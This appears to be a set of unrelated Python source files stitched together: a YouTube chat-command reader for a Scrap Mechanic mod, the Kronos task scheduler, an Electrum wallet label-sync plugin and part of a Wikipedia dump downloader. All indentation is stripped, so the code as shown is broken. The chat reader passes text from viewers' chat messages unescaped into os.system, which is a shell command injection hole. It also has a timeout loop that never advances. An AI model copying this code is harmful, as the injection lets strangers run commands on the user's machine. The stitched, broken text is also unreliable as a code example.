# init blueprint.json file path and description file path
jsonFile = os.path.join(dir_path,"downloads",fileId,"blueprint.json").replace("\\\\", "\\")
descFile = os.path.join(dir_path,"downloads",fileId,"description.json").replace("\\\\", "\\")
# init destination file paths
jsonFileDest = os.path.join(blueprintBase, fileId+".blueprint")
descFileDest = os.path.join(blueprintBase, fileId+"-desc.json")
# checks to see if its already been downloaded
if not os.path.exists(jsonFileDest):
# downloads workshop item (most errors happen here)
downloadWorkshopItem(command)
# init timeout handler (seconds * 1000 / 50)
timeOut = 100
errorCount = 0
# wait for file to exist or timeout
while (not os.path.exists(jsonFile)) and errorCount < timeOut:
errorCount += errorCount
time.sleep(50)
# copy blueprint and description file over to central folder
copyfile(jsonFile, jsonFileDest)
copyfile(descFile, descFileDest)
# gather json state (static versus dynamic)
state = 0.0
if len(command['params']) > 2:
state = getImportType(command['params'][2])
elif len(command['params']) > 1:
state = getImportType(command['params'][1])
# load the json blueprint
with open(jsonFileDest, 'r') as f:
jsonContent = json.loads(f.read())
# update the state
array = jsonContent["bodies"]
for i in range(len(array)):
array[i]["type"] = state
# save the json blueprint
with open(jsonFileDest, 'w') as json_file:
json.dump(jsonContent, json_file)
# create command queue
commandQue = []
commandQue.extend(toJson(command))
# update command queue
addToQue(commandQue, False)
except Exception as e:
# handle any download or file errors
logCommandError(e, command)
def getImportType(string):
if (string == "static"):
return 1
else:
return 0
def logCommandError(e, command):
# print error
print(e)
# generate new log command
command['type'] = "log"
command['params'] = str(e)
commandQue = []
commandQue.extend(toJson(command))
# add log to queue (to send error msg to SM)
addToQue(commandQue, False)
def downloadWorkshopItem(command):
# configure the start params correctly
param = param = command['params']
# if start params is not a string (ie. its an array) configure it
if not isinstance(command['params'], str):
param = command['params'][0]
# configure node run command
startArgs = "node ./SteamWorkshopDownloader/index.js " + param + " \"" + SM_Location + "\" > log.txt"
# start node app to download workshop item
exitCode = os.system(startArgs)
# if app exits with error (69) alert of download failure
if exitCode == 69:
raise Exception("Failed To Download Workshop Item: {0}".format(str(command['params'])))
def generateCommand(command,parameter,cmdData): #Generates command dictionary
command = {'id': cmdData['id'], 'type':command, 'params':parameter, 'username': cmdData['author'],
'sponsor': cmdData['sponsor'], 'userid': cmdData['userid'], 'amount': cmdData['amount']}
# print("Generated command:",command)
return command
def validatePayment(command,price,message):
# Validate payment data for the specified command
# not necessary, just need price and message
if command != None:
if SETTINGS['allFree'] or (SETTINGS['sponsorFree'] and message['sponsor']) or ((SETTINGS['fixedCost'] >0 and message['amount'] >= SETTINGS['fixedCost']) or message['amount'] >= price) :
return True
elif message['amount'] < price:
print("Insuficcient payment",message['amount'],price)
return False
else:
log("Payment Failed")
return False
def validateCommand(parameters):
# {command is a array of parameters}
comType = str(parameters[0])
index = None
price = None
errorType = None
# if comType == None or index error then wth??
# Check if command valid first
if comType in SETTINGS['commands'] or comType in SETTINGS['internalCommands']:
# a single line commnand with no extra params ex: kill, trip...
if len(parameters) == 1 or comType in SETTINGS['single']:
price = SETTINGS['commands'][comType]
#if an actual price
if type(price) is int:
return comType,index,price
# the command is supposed to have a parameter
else:
errorType = "Invalid parameter count"
return False,index,errorType
# command = with X parameters (max params is infinite for now)
elif len(parameters) > 1:
# grab the next index
index = str(parameters[1])
## do not uncomment these logs, you will get an error if you do
# log(SETTINGS['commands'][comType])
# log(index)
# Check for command type, or failure
if comType in SETTINGS['commands']:
# If valid item within that command
if index in SETTINGS['commands'][comType]:
# should be the maximum layer needed
price = SETTINGS['commands'][comType][index]
return comType,index,price
# added section for internally handled commands like the import command
elif comType in SETTINGS['internalCommands']:
return comType,parameters[1:],int(SETTINGS['internalCommands'][comType])
else:
errorType = "Index Invalid"
print("Unrecognized Index:",index)
else:
errorType = "Param Invalid"
print("Too many or not enought parameters",parameters)
else:
errorType = "Command Invalid"
print("unrecognized command",comType)
# Eventually have output error message
return False,index,errorType
def parseMessage(chat,mesID):
# parse any messages
comType = None
parameter = None
parsed = {'id': mesID, 'command': chat.message, 'author': chat.author.name, 'sponsor': chat.author.isChatSponsor, 'userid': chat.author.channelId, 'amount': chat.amountValue}
message = parsed['command'].lower()
# is actually a command # Possibly separate out to parsing function
if message[0] in SETTINGS['prefix']:
rawCommand = message.strip(message[0])
parameters = rawCommand.split() #TODO: More validation to fix any potential mistakes
# custom section for TheGuy920 and exclusive chat command ability
if chat.author.channelId == "UCbBBHW3dQkyw7-b1eBurnuQ" and parameters[0] == "chat" and SETTINGS['TheGuyMode'] == True: # special mode for TheGuy920
return generateCommand("chat",str(chat.message)[6:],parsed)
if len(parameters) == 0:
log("Only Recieved Prefix")
return None
comType,parameter,price = validateCommand(parameters)
if comType == False:
# possibly use index for details?
print("Received Error for",rawCommand+": ",price)
else:
# Now validate any payments
validPayment = validatePayment(comType,price,parsed)
if validPayment:
command = generateCommand(comType,parameter,parsed)
return command
else:
log("Invalid Payment")
# super chat section (no prefix but payed monies)
elif chat.amountValue > 0:
return generateCommand("chat",str(chat.message),parsed)
return None
def readChat():
commandQue = []
cID = 0
while chat.is_alive():
# Also do stats reading/outputting
with open(gameStats, 'r') as inFile:
gameInfo = json.load(inFile)
# log("Got GameStats",gameStats)
with open(statOutput, 'w') as outfile:
deaths = gameInfo['deaths']
output = "Deaths: {:.0f}".format(deaths)
outfile.write(output)
# log("outputing",output)
for c in chat.get().sync_items():
# log(c.datetime,c.author.name,c.message)
command = parseMessage(c,cID)
if command != None:
commandQue.append(command)
cID +=1
if len(commandQue) >0:
addToQue(commandQue, True)
time.sleep(1)
commandQue = []
try:
chat.raise_for_status()
except Exception as e:
print(type(e), str(e))
commandList = '''
List of available commands:
1. clear-cache
> clears cached imports
2. reset-deaths
> resets the death counter
3. help
> displays this wonderful help message
'''
# 3. remove-mod
# > restores the original game files, clears the cache, and removes the deathcounter and other files
def internalConsoleCommand(command):
if(command == "clear-cache"):
shutil.rmtree(blueprintBase)
os.makedirs(blueprintBase)
log("import cache cleared")
elif(command == "reset-deaths"):
with open(gameStats, 'w') as outfile:
outfile.write('{ "deaths": 0, "bonks": 0, "robotKills": 0 }')
log("deaths reset")
elif(command == "remove-mod"):
print(commandList)
elif(command == "help"):
print(commandList)
else:
print("Unknown command, try typing 'help'")
def toJson(obj):
# this is basically the same as generateCommand, but I made another one for some reason
jsonContent = jsonContent = "[ {\"id\": "+str(obj["id"])+", \"type\": \""+str(obj["type"])+"\", \"params\": \""+str(obj["params"])+"\", \"username\": \""+str(obj["username"])+"\", \"sponsor\": "+str(obj["sponsor"]).lower()+", \"userid\": \""+str(obj["userid"])+"\", \"amount\": "+str(obj["amount"])+"} ]"
# specical configuration if more than one parameter
if not isinstance(obj['params'], str):
params = "\""+"\",\"".join(obj["params"])+"\""
jsonContent = "[ {\"id\": "+str(obj["id"])+", \"type\": \""+str(obj["type"])+"\", \"params\": [ "+params+" ], \"username\": \""+str(obj["username"])+"\", \"sponsor\": "+str(obj["sponsor"]).lower()+", \"userid\": \""+str(obj["userid"])+"\", \"amount\": "+str(obj["amount"])+"} ]"
return json.loads(jsonContent)
# Planned commands: give speed, give slowness, lightning strike?, chop wood?
# chat = pytchat.create(video_id = SETTINGS['videoID']) # start reading livechat #Create it here?? or store in settings and generate on main()
chat = None
debug = False
# custom logging style (kinda dumb ngl)
def log(string):
print("["+str(string)+"]")
if __name__ == '__main__':
if debug:
pass
# debug stuff here
else:
# verify working video url
try:
try:
chat = pytchat.create(video_id=sys.argv[1])
SETTINGS['videoID'] = sys.argv[1]
except:
chat = pytchat.create(SETTINGS['videoID'])
except:
log("Video Id Failure")
ValidVideo = False
userIn = ''
while(not ValidVideo):
if len(userIn) > 0:
log('Video Id \'{0}\' is not valid'.format(userIn))
try:
userIn = input("YouTube Video Id => ")
chat = pytchat.create(video_id=userIn)
SETTINGS['videoID'] = userIn
ValidVideo = True
except:
pass
# print("Checking for backups...") maybe sum day :(
print("Installing Pre-Requisites...")
# create nessesary files and folders if the do not exist
if not os.path.exists(dataBase):
os.makedirs(dataBase)
if not os.path.exists(blueprintBase):
os.makedirs(blueprintBase)
if not os.path.exists(statOutput):
open(statOutput, 'a').close()
if not os.path.exists(gameStats):
open(gameStats, 'a').close()
streamchatFile = open(os.path.join(dataBase, "streamchat.json"), "w")
streamchatFile.write("[]")
streamchatFile.close()
# install modded lua files
copyfile(os.path.join(base,"survival_streamreader.lua"), os.path.join(dataBase, "survival_streamreader.lua"))
copyfile(os.path.join(base,"BaseWorld.lua"), os.path.join(smBase, "worlds", "BaseWorld.lua"))
copyfile(os.path.join(base,"SurvivalGame.lua"), os.path.join(smBase, "SurvivalGame.lua"))
log("Stream Reader initialized")
# start the reader as thread
threading.Thread(target=readChat).start()
# listen for user commands
while(True):
internalConsoleCommand(input(""))
|
kronos.py
|
#!/usr/bin/python
"""Module that provides a cron-like task scheduler.
This task scheduler is designed to be used from inside your own program.
You can schedule Python functions to be called at specific intervals or
days. It uses the standard 'sched' module for the actual task scheduling,
but provides much more:
* repeated tasks (at intervals, or on specific days)
* error handling (exceptions in tasks don't kill the scheduler)
* optional to run scheduler in its own thread or separate process
* optional to run a task in its own thread or separate process
If the threading module is available, you can use the various Threaded
variants of the scheduler and associated tasks. If threading is not
available, you could still use the forked variants. If fork is also
not available, all processing is done in a single process, sequentially.
There are three Scheduler classes:
Scheduler ThreadedScheduler ForkedScheduler
You usually add new tasks to a scheduler using the add_interval_task or
add_daytime_task methods, with the appropriate processmethod argument
to select sequential, threaded or forked processing. NOTE: it is impossible
to add new tasks to a ForkedScheduler, after the scheduler has been started!
For more control you can use one of the following Task classes
and use schedule_task or schedule_task_abs:
IntervalTask ThreadedIntervalTask ForkedIntervalTask
SingleTask ThreadedSingleTask ForkedSingleTask
WeekdayTask ThreadedWeekdayTask ForkedWeekdayTask
MonthdayTask ThreadedMonthdayTask ForkedMonthdayTask
Kronos is the Greek God of Time.
Kronos scheduler (c) Irmen de Jong.
This version has been extracted from the Turbogears source repository
and slightly changed to be completely stand-alone again. Also some fixes
have been made to make it work on Python 2.6 (sched module changes).
The version in Turbogears is based on the original stand-alone Kronos.
This is open-source software, released under the MIT Software License:
http://www.opensource.org/licenses/mit-license.php
"""
__version__="2.0"
__all__ = [
"DayTaskRescheduler",
"ForkedIntervalTask",
"ForkedMonthdayTask",
"ForkedScheduler",
"ForkedSingleTask",
"ForkedTaskMixin",
"ForkedWeekdayTask",
"IntervalTask",
"MonthdayTask",
"Scheduler",
"SingleTask",
"Task",
"ThreadedIntervalTask",
"ThreadedMonthdayTask",
"ThreadedScheduler",
"ThreadedSingleTask",
"ThreadedTaskMixin",
"ThreadedWeekdayTask",
"WeekdayTask",
"add_interval_task",
"add_monthday_task",
"add_single_task",
"add_weekday_task",
"cancel",
"method",
]
import os
import sys
import sched
import time
import traceback
import weakref
import logging
class method:
sequential="sequential"
forked="forked"
threaded="threaded"
class Scheduler:
"""The Scheduler itself."""
def __init__(self):
self.running=True
self.sched = sched.scheduler(time.time, self.__delayfunc)
def __delayfunc(self, delay):
# This delay function is basically a time.sleep() that is
# divided up, so that we can check the self.running flag while delaying.
# there is an additional check in here to ensure that the top item of
# the queue hasn't changed
if delay<10:
time.sleep(delay)
else:
toptime = self._getqueuetoptime()
endtime = time.time() + delay
period = 5
stoptime = endtime - period
while self.running and stoptime > time.time() and \
self._getqueuetoptime() == toptime:
time.sleep(period)
if not self.running or self._getqueuetoptime() != toptime:
return
now = time.time()
if endtime > now:
time.sleep(endtime - now)
def _acquire_lock(self):
pass
def _release_lock(self):
pass
def add_interval_task(self, action, taskname, initialdelay, interval,
processmethod, args, kw):
"""Add a new Interval Task to the schedule.
A very short initialdelay or one of zero cannot be honored, you will
see a slight delay before the task is first executed. This is because
the scheduler needs to pick it up in its loop.
"""
if initialdelay < 0 or interval < 1:
raise ValueError("Delay or interval must be >0")
# Select the correct IntervalTask class. Not all types may be available!
if processmethod == method.sequential:
TaskClass = IntervalTask
elif processmethod == method.threaded:
TaskClass = ThreadedIntervalTask
elif processmethod == method.forked:
TaskClass = ForkedIntervalTask
else:
raise ValueError("Invalid processmethod")
if not args:
args = []
if not kw:
kw = {}
task = TaskClass(taskname, interval, action, args, kw)
self.schedule_task(task, initialdelay)
return task
def add_single_task(self, action, taskname, initialdelay, processmethod,
args, kw):
"""Add a new task to the scheduler that will only be executed once."""
if initialdelay < 0:
raise ValueError("Delay must be >0")
# Select the correct SingleTask class. Not all types may be available!
if processmethod == method.sequential:
TaskClass = SingleTask
elif processmethod == method.threaded:
TaskClass = ThreadedSingleTask
elif processmethod == method.forked:
TaskClass = ForkedSingleTask
else:
raise ValueError("Invalid processmethod")
if not args:
args = []
if not kw:
kw = {}
task = TaskClass(taskname, action, args, kw)
self.schedule_task(task, initialdelay)
return task
def add_daytime_task(self, action, taskname, weekdays, monthdays, timeonday,
processmethod, args, kw):
"""Add a new Day Task (Weekday or Monthday) to the schedule."""
if weekdays and monthdays:
raise ValueError("You can only specify weekdays or monthdays, "
"not both")
if not args:
args = []
if not kw:
kw = {}
if weekdays:
# Select the correct WeekdayTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = WeekdayTask
elif processmethod == method.threaded:
TaskClass = ThreadedWeekdayTask
elif processmethod == method.forked:
TaskClass = ForkedWeekdayTask
else:
raise ValueError("Invalid processmethod")
task=TaskClass(taskname, weekdays, timeonday, action, args, kw)
if monthdays:
# Select the correct MonthdayTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = MonthdayTask
elif processmethod == method.threaded:
TaskClass = ThreadedMonthdayTask
elif processmethod == method.forked:
TaskClass = ForkedMonthdayTask
else:
raise ValueError("Invalid processmethod")
task=TaskClass(taskname, monthdays, timeonday, action, args, kw)
firsttime=task.get_schedule_time(True)
self.schedule_task_abs(task, firsttime)
return task
def schedule_task(self, task, delay):
"""Add a new task to the scheduler with the given delay (seconds).
Low-level method for internal use.
"""
if self.running:
# lock the sched queue, if needed
self._acquire_lock()
try:
task.event = self.sched.enter(delay, 0, task,
(weakref.ref(self),) )
finally:
self._release_lock()
else:
task.event = self.sched.enter(delay, 0, task,
(weakref.ref(self),) )
def schedule_task_abs(self, task, abstime):
"""Add a new task to the scheduler for the given absolute time value.
Low-level method for internal use.
"""
if self.running:
# lock the sched queue, if needed
self._acquire_lock()
try:
task.event = self.sched.enterabs(abstime, 0, task,
(weakref.ref(self),) )
finally:
self._release_lock()
else:
task.event = self.sched.enterabs(abstime, 0, task,
(weakref.ref(self),) )
def start(self):
"""Start the scheduler."""
self._run()
def stop(self):
"""Remove all pending tasks and stop the Scheduler."""
self.running = False
self._clearschedqueue()
def cancel(self, task):
"""Cancel given scheduled task."""
self.sched.cancel(task.event)
if sys.version_info>=(2,6):
# code for sched module of python 2.6+
def _getqueuetoptime(self):
try:
return self.sched._queue[0].time
except IndexError:
return 0.0
def _clearschedqueue(self):
self.sched._queue[:] = []
else:
# code for sched module of python 2.5 and older
def _getqueuetoptime(self):
try:
return self.sched.queue[0][0]
except IndexError:
return 0.0
def _clearschedqueue(self):
self.sched.queue[:] = []
def _run(self):
# Low-level run method to do the actual scheduling loop.
while self.running:
try:
self.sched.run()
except Exception,x:
logging.error("ERROR DURING SCHEDULER EXECUTION %s" % str(x), exc_info=True)
# queue is empty; sleep a short while before checking again
if self.running:
time.sleep(5)
class Task:
"""Abstract base class of all scheduler tasks"""
def __init__(self, name, action, args, kw):
"""This is an abstract class!"""
self.name=name
self.action=action
self.args=args
self.kw=kw
def __call__(self, schedulerref):
"""Execute the task action in the scheduler's thread."""
try:
self.execute()
except Exception,x:
self.handle_exception(x)
self.reschedule(schedulerref())
def reschedule(self, scheduler):
"""This method should be defined in one of the sub classes!"""
raise NotImplementedError("You're using the abstract base class 'Task',"
" use a concrete class instead")
def execute(self):
"""Execute the actual task."""
self.action(*self.args, **self.kw)
def handle_exception(self, exc):
"""Handle any exception that occured during task execution."""
logging.error("ERROR DURING SCHEDULER EXECUTION %s" % str(exc), exc_info=True)
class SingleTask(Task):
"""A task that only runs once."""
def reschedule(self, scheduler):
pass
class IntervalTask(Task):
"""A repeated task that occurs at certain intervals (in seconds)."""
def __init__(self, name, interval, action, args=None, kw=None):
Task.__init__(self, name, action, args, kw)
self.interval = interval
def reschedule(self, scheduler):
"""Reschedule this task according to its interval (in seconds)."""
scheduler.schedule_task(self, self.interval)
class DayTaskRescheduler:
"""A mixin class that contains the reschedule logic for the DayTasks."""
def __init__(self, timeonday):
self.timeonday = timeonday
def get_schedule_time(self, today):
"""Calculate the time value at which this task is to be scheduled."""
now = list(time.localtime())
if today:
# schedule for today. let's see if that is still possible
if (now[3], now[4]) >= self.timeonday:
# too bad, it will be tomorrow
now[2] += 1
else:
# tomorrow
now[2] += 1
# set new time on day (hour,minute)
now[3], now[4] = self.timeonday
# seconds
now[5] = 0
return time.mktime(now)
def reschedule(self, scheduler):
"""Reschedule this task according to the daytime for the task.
The task is scheduled for tomorrow, for the given daytime.
"""
# (The execute method in the concrete Task classes will check
# if the current day is a day on which the task must run).
abstime = self.get_schedule_time(False)
scheduler.schedule_task_abs(self, abstime)
class WeekdayTask(DayTaskRescheduler, Task):
"""A task that is called at specific days in a week (1-7), at a fixed time
on the day.
"""
def __init__(self, name, weekdays, timeonday, action, args=None, kw=None):
if type(timeonday) not in (list, tuple) or len(timeonday) != 2:
raise TypeError("timeonday must be a 2-tuple (hour,minute)")
if type(weekdays) not in (list, tuple):
raise TypeError("weekdays must be a sequence of weekday numbers "
"1-7 (1 is Monday)")
DayTaskRescheduler.__init__(self, timeonday)
Task.__init__(self, name, action, args, kw)
self.days = weekdays
def execute(self):
# This is called every day, at the correct time. We only need to
# check if we should run this task today (this day of the week).
weekday = time.localtime().tm_wday + 1
if weekday in self.days:
self.action(*self.args, **self.kw)
class MonthdayTask(DayTaskRescheduler, Task):
"""A task that is called at specific days in a month (1-31), at a fixed
time on the day.
"""
def __init__(self, name, monthdays, timeonday, action, args=None, kw=None):
if type(timeonday) not in (list, tuple) or len(timeonday) != 2:
raise TypeError("timeonday must be a 2-tuple (hour,minute)")
if type(monthdays) not in (list, tuple):
raise TypeError("monthdays must be a sequence of monthdays numbers "
"1-31")
DayTaskRescheduler.__init__(self, timeonday)
Task.__init__(self, name, action, args, kw)
self.days = monthdays
def execute(self):
# This is called every day, at the correct time. We only need to
# check if we should run this task today (this day of the month).
if time.localtime().tm_mday in self.days:
self.action(*self.args, **self.kw)
try:
import threading
class ThreadedScheduler(Scheduler):
"""A Scheduler that runs in its own thread."""
def __init__(self):
Scheduler.__init__(self)
# we require a lock around the task queue
self._lock = threading.Lock()
def start(self):
"""Splice off a thread in which the scheduler will run."""
self.thread = threading.Thread(target=self._run)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
"""Stop the scheduler and wait for the thread to finish."""
Scheduler.stop(self)
try:
self.thread.join()
except AttributeError:
pass
def _acquire_lock(self):
"""Lock the thread's task queue."""
self._lock.acquire()
def _release_lock(self):
"""Release the lock on th ethread's task queue."""
self._lock.release()
class ThreadedTaskMixin:
"""A mixin class to make a Task execute in a separate thread."""
def __call__(self, schedulerref):
"""Execute the task action in its own thread."""
threading.Thread(target=self.threadedcall).start()
self.reschedule(schedulerref())
def threadedcall(self):
# This method is run within its own thread, so we have to
# do the execute() call and exception handling here.
try:
self.execute()
except Exception,x:
self.handle_exception(x)
class ThreadedIntervalTask(ThreadedTaskMixin, IntervalTask):
"""Interval Task that executes in its own thread."""
pass
class ThreadedSingleTask(ThreadedTaskMixin, SingleTask):
"""Single Task that executes in its own thread."""
pass
class ThreadedWeekdayTask(ThreadedTaskMixin, WeekdayTask):
"""Weekday Task that executes in its own thread."""
pass
class ThreadedMonthdayTask(ThreadedTaskMixin, MonthdayTask):
"""Monthday Task that executes in its own thread."""
pass
except ImportError:
# threading is not available
pass
if hasattr(os, "fork"):
import signal
class ForkedScheduler(Scheduler):
"""A Scheduler that runs in its own forked process."""
def __del__(self):
if hasattr(self, "childpid"):
os.kill(self.childpid, signal.SIGKILL)
def start(self):
"""Fork off a new process in which the scheduler will run."""
pid = os.fork()
if pid == 0:
# we are the child
signal.signal(signal.SIGUSR1, self.signalhandler)
self._run()
os._exit(0)
else:
# we are the parent
self.childpid = pid
# can no longer insert in the scheduler queue
del self.sched
def stop(self):
"""Stop the scheduler and wait for the process to finish."""
os.kill(self.childpid, signal.SIGUSR1)
os.waitpid(self.childpid, 0)
def signalhandler(self, sig, stack):
Scheduler.stop(self)
class ForkedTaskMixin:
"""A mixin class to make a Task execute in a separate process."""
def __call__(self, schedulerref):
"""Execute the task action in its own process."""
pid = os.fork()
if pid == 0:
# we are the child
try:
self.execute()
except Exception,x:
self.handle_exception(x)
os._exit(0)
else:
# we are the parent
self.reschedule(schedulerref())
class ForkedIntervalTask(ForkedTaskMixin, IntervalTask):
"""Interval Task that executes in its own process."""
pass
class ForkedSingleTask(ForkedTaskMixin, SingleTask):
"""Single Task that executes in its own process."""
pass
class ForkedWeekdayTask(ForkedTaskMixin, WeekdayTask):
"""Weekday Task that executes in its own process."""
pass
class ForkedMonthdayTask(ForkedTaskMixin, MonthdayTask):
"""Monthday Task that executes in its own process."""
pass
if __name__=="__main__":
def testaction(arg):
print ">>>TASK",arg,"sleeping 3 seconds"
time.sleep(3)
print "<<<END_TASK",arg
s=ThreadedScheduler()
s.add_interval_task( testaction, "test action 1", 0, 4, method.threaded, ["task 1"], None )
s.start()
print "Scheduler started, waiting 15 sec...."
time.sleep(15)
print "STOP SCHEDULER"
s.stop()
print "EXITING"
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
import electrum_smart as electrum
from electrum_smart.plugins import BasePlugin, hook
from electrum_smart.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.electrum.org'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = electrum.bitcoin.aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = electrum.bitcoin.aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if wallet not in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request_safe,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise Exception(response.status_code, response.text)
response = response.json()
if "error" in response:
raise Exception(response["error"])
return response
def do_request_safe(self, *args, **kwargs):
try:
self.do_request(*args, **kwargs)
except BaseException as e:
#traceback.print_exc(file=sys.stderr)
self.print_error('error doing request')
def push_thread(self, wallet):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
def pull_thread_safe(self, wallet, force):
try:
self.pull_thread(wallet, force)
except BaseException as e:
# traceback.print_exc(file=sys.stderr)
self.print_error('could not retrieve labels')
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread_safe, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
wiki_dump_download.py
|
#from dotenv import load_dotenv
#load_dotenv()
import argparse
import glob
import hashlib
import json
import io
import logging
import os
import threading
import urllib.request
from datetime import datetime
#from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient
def get_dump_task(dump_status_file, data_path, compress_type, start, end, azure=False):
url_list = []
file_list = []
with open(dump_status_file) as json_data:
# Two dump types: compressed by 7z (metahistory7zdump) or bz2 (metahistorybz2dump)
history_dump = json.load(json_data)['jobs']['metahistory' + compress_type + 'dump']
dump_dict = history_dump['files']
dump_files = sorted(list(dump_dict.keys()))
if end > 0 and end <= len(dump_files):
dump_files = dump_files[start - 1:end]
else:
dump_files = dump_files[start - 1:]
# print all files to be downloaded.
print("All files to download ...")
for i, file in enumerate(dump_files):
print(i + start, file)
file_num = 0
for dump_file in dump_files:
file_name = os.path.join(data_path, dump_file)
file_list.append(file_name)
# url example: https://dumps.wikimedia.org/enwiki/20180501/enwiki-20180501-pages-meta-history1.xml-p10p2123.7z
url = "https://dumps.wikimedia.org" + dump_dict[dump_file]['url']
url_list.append(url)
file_num += 1
print('Total file ', file_num, ' to be downloaded ...')
json_data.close()
task = WikiDumpTask(file_list, url_list)
return task
def download(dump_status_file, data_path, compress_type, start, end,
thread_num, azure=False):
task = get_dump_task(dump_status_file, data_path, compress_type, start, end, azure)
threads = []
for i in range(thread_num):
t = threading.Thread(target=worker, args=(i, task, azure))
threads.append(t)
t.start()
logging.debug('Waiting for worker threads')
main_thread = threading.currentThread()
for t in threading.enumerate():
if t is not main_thread:
t.join()
def existFile(data_path, cur_file, compress_type, container_client=None, azure=False):
if not azure:
exist_file_list = glob.glob(data_path + "*." + compress_type)
else:
exist_file_list = [b.name for b in container_client.list_blobs() if data_path in b.name]
exist_file_names = [os.path.basename(i) for i in exist_file_list]
cur_file_name = os.path.basename(cur_file)
if cur_file_name in exist_file_names:
return True
return False
def md5(file):
hash_md5 = hashlib.md5()
with open(file, "rb") as f:
for chunk in iter(lambda: f.read(40960000), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def verify(dump_status_file, compress_type, data_path):
print("Verify the file in folder:", data_path)
pass_files, miss_files, crash_files = [], [], []
with open(dump_status_file) as json_data:
# Two dump types: compressed by 7z (metahistory7zdump) or bz2 (metahistorybz2dump)
history_dump = json.load(json_data)['jobs']['metahistory' + compress_type + 'dump']
dump_dict = history_dump['files']
for i, (file, value) in enumerate(dump_dict.items()):
gt_md5 = value['md5']
print("#", i, " ", file, ' ', value['md5'], sep='')
if existFile(data_path, file, compress_type):
file_md5 = md5(data_path + file)
if file_md5 == gt_md5:
pass_files.append(file)
else:
crash_files.append(file)
else:
miss_files.append(file)
print(len(pass_files), "files passed, ", len(miss_files), "files missed, ", len(crash_files), "files crashed.")
if len(miss_files):
print("==== Missed Files ====")
print(miss_files)
if len(crash_files):
print("==== Crashed Files ====")
print(crash_files)
def main():
dump_status_file = args.dumpstatus_path
if args.verify:
verify(dump_status_file, args.compress_type, args.data_path)
else:
download(dump_status_file, args.data_path, args.compress_type,
args.start, args.end, args.threads, args.azure)
'''
WikiDumpTask class contains a list of dump files to be downloaded .
The assign_task function will be called by workers to grab a task.
'''
class WikiDumpTask(object):
def __init__(self, file_list, url_list):
self.lock = threading.Lock()
self.url_list = url_list
self.file_list = file_list
self.total_num = len(url_list)
def assign_task(self):
logging.debug('Assign tasks ... Waiting for lock')
self.lock.acquire()
url = None
file_name = None
cur_progress = None
try:
# logging.debug('Acquired lock')
if len(self.url_list) > 0:
url = self.url_list.pop(0)
file_name = self.file_list.pop(0)
cur_progress = self.total_num - len(self.url_list)
finally:
self.lock.release()
return url, file_name, cur_progress, self.total_num
'''
worker is main function for each thread.
'''
def worker(work_id, tasks, azure=False):
logging.debug('Starting.')
# Azure connection
container_client = None
if azure:
connect_str = os.getenv('AZURE_STORAGE_CONNECTION_STRING')
blob_service_client = BlobServiceClient.from_connection_string(connect_str)
